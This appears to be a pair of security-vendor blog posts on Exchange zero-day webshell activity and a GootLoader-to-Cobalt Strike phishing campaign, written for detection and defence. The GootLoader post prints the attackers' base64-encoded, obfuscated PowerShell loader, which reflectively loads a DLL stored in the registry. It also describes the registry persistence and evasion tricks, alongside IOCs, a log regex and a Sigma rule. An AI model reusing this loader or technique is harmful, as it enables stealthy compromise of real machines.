It’s been observed in the wild that the CVEs have been used to drop webshells on exploited Exchange servers, including Antsword, a Chinese opensource cross-platform website administration tool supporting webshell management. The webshell’s codepage is also set to a Microsoft character encoding for simplified Chinese, again suggesting China-based actor involvement. During these exploitation campaigns, attackers leveraging the vulnerabilities also modified the file RedirSuiteServiceProxy.aspx to contain a webshell. GTSC also reported the use of SharPyShell, a small and obfuscated ASP.net webshell for C# web applications.

As part of their Tactics, Techniques, and Procedures (TTPs), attackers exploiting the vulnerabilities have also been observed leveraging the native Windows binary, certutil.exe, to connect to command-and-control infrastructure and retrieve malicious payloads. Some of the commands share similarities with those used by the Chinese Chopper web shell malware. The attackers also leverage in-memory DLL injection and native Windows WMIC systems to execute files.

To identify potential exploitation leveraging these vulnerabilities, administrators can check Microsoft IIS Logs for the following string indicating potential compromise:

    powershell.*autodiscover\.json.*\@.*200

Microsoft is currently working to develop a patch for the vulnerabilities; however, Microsoft Exchange administrators should take immediate action to defend systems and search for prior signs of compromise.

Keeping a network secure from zero-day exploitation requires a layered defense-in-depth approach. Externally available services such as email servers continue to be a prime target for exploitation by threat actors. Systems such as Adlumin’s Perimeter Defense capabilities can monitor these external systems for the appearance of exploitation artifacts such as newly opened ports on internet-accessible servers used for remote exploitation interfaces such as PowerShell.

Continuous Monitoring

Adlumin recommends using a Continuous Vulnerability Management (CVM) product to collect the needed data from endpoints to determine if they are running vulnerable versions of Microsoft Windows and Office. CVM software can also be used to identify those assets which have or do not have the official Microsoft mitigation in place. Adlumin also recommends leveraging the business’s SIEM product to continually search and alert for suspicious executions which may be a result of the exploitation of the vulnerability.

Resources

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-41040
  3. https://gteltsc. vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server (Deprecated)
  4. https://www.techtarget.com/whatis/feature/Everything-you-need-to-know-about-ProxyShell-vulnerabilities
  5. https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/
  6. https://github.com/antonioCoco/SharPyShell

Everything you Need to Know about Tracking GootLoader

By: Kyle Auer & Kevin O’Connor
Adlumin’s Threat Visibility Team has observed an increase in GootLoader-based malware and identified a possible unified campaign leveraging GootLoader with follow-on Cobalt Strike payloads in attempts to breach U.S. businesses including multiple Adlumin customers.

What is GootLoader?

GootLoader is a presumed access-as-a-service malware 1, with its developers also being responsible for the GootKit malware as first reported by Dr. Web in 2014 2. GootKit, the actor’s namesake and original toolkit, is distinct from GootLoader in that GootLoader is closer to an initial access capability which leverages follow on stages such as Cobalt Strike, various Ransomware payloads, and potentially GootKit – the latter of which has fallen out of favor since gaining notoriety in 2019 due to infrastructure compromise 3.
As an access-as-a-service malware, the GootLoader operators would be expected to sell direct access to compromised hosts and systems or provide buyers with harvested credentials and access points into a targeted network. A less frequent operation under this model might involve the GootLoader actors loading second-stage payloads as access brokers.

Tracking the Campaign

Adlumin is observing and tracking an active exploitation campaign utilizing GootLoader against U.S. businesses in multiple industries and verticals. What we’ve observed in this campaign is uniform deployment of Cobalt Strike payloads following exploitation and initial access provided by GootLoader. It’s unknown if these Cobalt Strike payloads are used by GootLoader developers to provide direct access to an infected target or used to harvest credentials and other data which is brokered to a buyer for access or exploited in some other way.
Our investigation is tracking an exploitation campaign which we defined based on:

  1. Like to identical initial access and exploit methodologies
  2. Like to identical command and control infrastructure and methodology
  3. Like to identical operations time-frame
  4. Like to identical first-stage “loader” malware, GootLoader
  5. Like to identical second-stage follow-on malware, Cobalt Strike

Campaign Tactics, Techniques, and Procedures (TTPs)

This GootLoader campaign begins its attack by phishing potential victims’ business emails. Unlike other campaigns reported earlier in 2021 and 20224, this campaign has not yet been observed relying on specific SEO poisoning attacks to deliver its payload. We believe the payloads are also not being disguised as legitimate JQuery libraries as previously seen.
It starts with an email…

Figure 1: The Attack Begins with a Malicious JavaScript file contained in a Zip Archive

The first stage in the campaign against a target is a simple phishing email. These emails have an attached Zip archive, which contains a JavaScript payload the victim is tricked in to running after opening. This JavaScript payload is executed by a Windows Operating System native binary, Windows Script Host (wscript.exe), which is a legitimate application typically used for logon scripts, administration, and automation and provides an execution environment in which the script can run. Our team believes that the JavaScript payload is delivered via a compressed archive to help mitigate detection by email and malware scanners.

GootLoader_Image_2

Figure 2: JavaScript is executed by wscript.exe

GootLoader will then use this wscript.exe executing JavaScript to download an additional  JavaScript resource which is loaded by the original calling wscript.exe process. This secondary exploitation payload is responsible for persisting two separate payloads.

GootLoader_Image_3

Figure 3: wscript.exe retrieves payloads from Command and Control Server

Persistence

GootLoader will use its secondary JavaScript payload to write two registry keys to the Window’s Current User registry hive (HKCU). In this tracked campaign the two registry keys were stored in:

  • HKCU:\\Software\Microsoft\Phone\user0
  • HKCU:\\Software\Microsoft\Phone\user

GootLoader_Image_4

Figure 4: wscript.exe runs PowerShell to persist malware as a task, and writes encoded payloads to registry

Kick-Off

After having saved the next two stages to the registry, the wscript.exe process will execute PowerShell to run PowerShell commands which will kick-off the first-stage malware implant. To help evade detection by security software, the executed PowerShell commands make use of multiple evasion techniques including

  • Base64 Encoding the Command
  • Command abbreviation
  • Variable substitution
  • String concatenation
    • MwA1ADEANAA5ADcAOAA5ADsAcwBsAGUAZQBwACAALQBzACAANwA4ADsAJABqAHQAPQBHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBwAGEAdABoACAAKAAiAGgAawAiACsAIgBjAHUAOgBcAHMAbwBmACIAKwAiAHQAdwAiACsAIgBhAHIAZQBcAG0AaQBjACIAKwAiAHIAbwBzACIAKwAiAG8AZgB0AFwAUABoAG8AbgBlAFwAIgArAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6ACgAIgB1AHMAZQAiACsAIgByAG4AIgArACIAYQBtAGUAIgApACsAIgAwACIAKQA7AGYAbwByACAAKAAkAHMAdQBzAD0AMAA7ACQAcwB1AHMAIAAtAGwAZQAgADcAMAAwADsAJABzAHUAcwArACsAKQB7AFQAcgB5AHsAJABzAGEAKwA9ACQAagB0AC4AJABzAHUAcwB9AEMAYQB0AGMAaAB7AH0AfQA7ACQAcwB1AHMAPQAwADsAdwBoAGkAbABlACgAJAB0AHIAdQBlACkAewAkAHMAdQBzACsAKwA7ACQAawBvAD0AWwBtAGEAdABoAF0AOgA6ACgAIgBzAHEAIgArACIAcgB0ACIAKQAoACQAcwB1AHMAKQA7AGkAZgAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewBiAHIAZQBhAGsAfQB9ACQAaABpAHQAPQAkAHMAYQAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAOwAkAGUAagB2AD0AWwBiAHkAdABlAFsAXQBdADoAOgAoACIAbgBlACIAKwAiAHcAIgApACgAJABoAGkAdAAuAEwAZQBuAGcAdABoAC8AMgApADsAZgBvAHIAKAAkAHMAdQBzAD0AMAA7ACQAcwB1AHMAIAAtAGwAdAAgACQAaABpAHQALgBMAGUAbgBnAHQAaAA7ACQAcwB1AHMAKwA9ADIAKQB7ACQAZQBqAHYAWwAkAHMAdQBzAC8AMgBdAD0AWwBjAG8AbgB2AGUAcgB0AF0AOgA6ACgAIgBUAG8AQgAiACsAIgB5AHQAZQAiACkAKAAkAGgAaQB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdQBzACwAMgApACwAKAAyACoAOAApACkAfQBbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApACgAJABlAGoAdgApADsAWwBPAHAAZQBuAF0AOgA6ACgAIgBUAGUAIgArACIAcwB0ACIAKQAoACkAOwA3ADQANAA0ADkAMQA3ADIAOwA=

Decoding from Base64 and encoding with UTF-16LE we can see the commands contents:

GootLoader_Image_5

Figure 5: Decoded PowerShell Command Loading Stage 1 Implant

This command will grab the contents of the first registry key, HKCU:/SOFTWARE/Microsoft/phone/$USERNAME0, decode the encoded .NET DLL it contains, and then run the Test() function contained in the DLL us as an execution start point.

Obtaining Decoded Stage-1

To get the malware to drop the DLL unencoded for further analysis rather than directly loading and calling it via PowerShell, we modified the executed PowerShell command to write the contents to a file by appending the following before the last SLEEPfunction.

                  +> Set-Content $PATH -Value $ejv -Encoding Byte

This allowed us to analyze this first-stage implant to identify that the Test() function was being used to load the second-stage implant.

GootLoader_Image_6

Figure 6: PowerShell.exe decodes the GootLoader implant which decodes and runs the secondary payload, Cobalt Strike

Second Stage Payload

The second payload and malware implant used by GootLoader in this campaign is Cobalt Strike. The second registry key written in the earlier stage to HKCU:\..Phone\$USERNAME contains an encoded Cobalt Strike beacon. When the first-stage’s Test() function is executed, it decodes, loads, and executes the Cobalt Strike beacon into memory.

To analyze the Cobalt Strike beacon we modified the retrieved first payload which loads the beacon, to instead write the beacon unencoded to disk for retrieval and analysis. We did this by adding additional library imports used for writing a file and adding a main function which will call the Test() loader.

GootLoader_Image_7

Figure 7: Adding additional imports to 1st Stage Malware Implant

GootLoader_Image_8

Figure 8: Adding function to call the 2nd Stage DLL’s Test() function

We then created a BinaryWriter object and comment out some of the lines which would execute the Cobalt Strike beacon.

Figure 9: Modifying 1st stage to prevent 2nd stage execution and retrieve decoded 2nd stage

After building and running the code, we obtained the decoded second-stage Cobalt Strike payload.

Extracting Campaign IOCs from Cobalt Strike

Cobalt Strike is a paid penetration testing software which includes configurable malware implants that are often repurposed for use in real malware operations and infections. The Cobalt Strike beacon provides functionality for the attacker including command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained[5].Cobalt Strike has exploded in popularity in usage by cyber-criminals[6], and is a perfect launching platform for continued attacks or access transfer.

Once we had the decoded Cobalt Strike beacon written to disk, we were able to use public decoders to extract Cobalt Strike configuration information such as command and control addresses. We used the Python-based Cobalt Strike Configuration Extractor and Parser which can be found on GitHub, here.

Figure 10: Decoded Cobalt Strike Beacon Payload

This allowed us to obtain the malware command and control infrastructure used by the attackers to control the Cobalt Strike implant.

Figure 11: Cobalt Strike is run and beacons to Cobalt Strike command and control server

Summary & Future Reads

Once Adlumin’s Threat Visibility Team had the initial payload, follow-on implant stages, and leads on command-and-control infrastructure, we quickly created detections for our MDR platform, which merges data from multiple security relevant data sources including the endpoint and installed security software. These detections caught subsequent attacks from the same campaign and identified some historical retroactive activity. Some key defenses and mitigations for the campaign include:

  • Adequate phishing mitigation and attachment scanning solutions
  • Monitoring of wscript.exe executions of JavaScript files from compressed archives
  • Monitoring of PowerShell executions, especially of encoded commands, which have a parent process of wscript.exe
  • Implementing a Proactive Defense program that is equipped with fully managed security awareness testing and training, designed to empower employees to recognize and reduce the risk posed by cybercriminals.

Additionally, Adlumin is sharing the following indicators used in this campaign with the community:

  • 93[.]115[.]29[.]50
  • hxxps://streamlock[.]net

We’d also like to share the below Sigma rule to help identify possible exploitation activity:

title: GootLoader Zipped JS WScript
id: 37d82863-216a-41a3-a4de-b09cea08eb92
action: global
status: experimental
references:
– https://adlumin.com
date: 2022/09/26
tags:
– attack.execution
– attack.t1059
author: Adlumin, Kyle Auer, Kevin O’Connor
detection:
condition: selection
level: medium
logsource:
category: process_execution
product: windows
detection:
selection_1:
Image|endswith:
– ‘\powershell.exe’
ParentImage|endswith
– ‘\wscript.exe’
selection_2:
Image|endswith:
– ‘\wscript.exe’
selection_3:
CommandLine|all:
– ‘*AppData*’
– ‘*zip*’
– ‘*.js*’
condition: (selection_1 or selection_2) and selection_3

Make sure to follow Adlumin for follow-up posts where we’ll dive deeper into the actor’s infrastructure and operations!

Resources:

  1. https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html
  2. https://securelist.com/gootkit-the-cautious-trojan/102731/
  3. https://www.zdnet.com/article/gootkit-malware-crew-left-their-database-exposed-online-without-a-password/
  4. https://blogs.blackberry.com/en/2022/07/gootloader-from-seo-poisoning-to-multi-stage-downloader
  5. https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
  6. https://threatpost.com/cobalt-strike-cybercrooks/167368/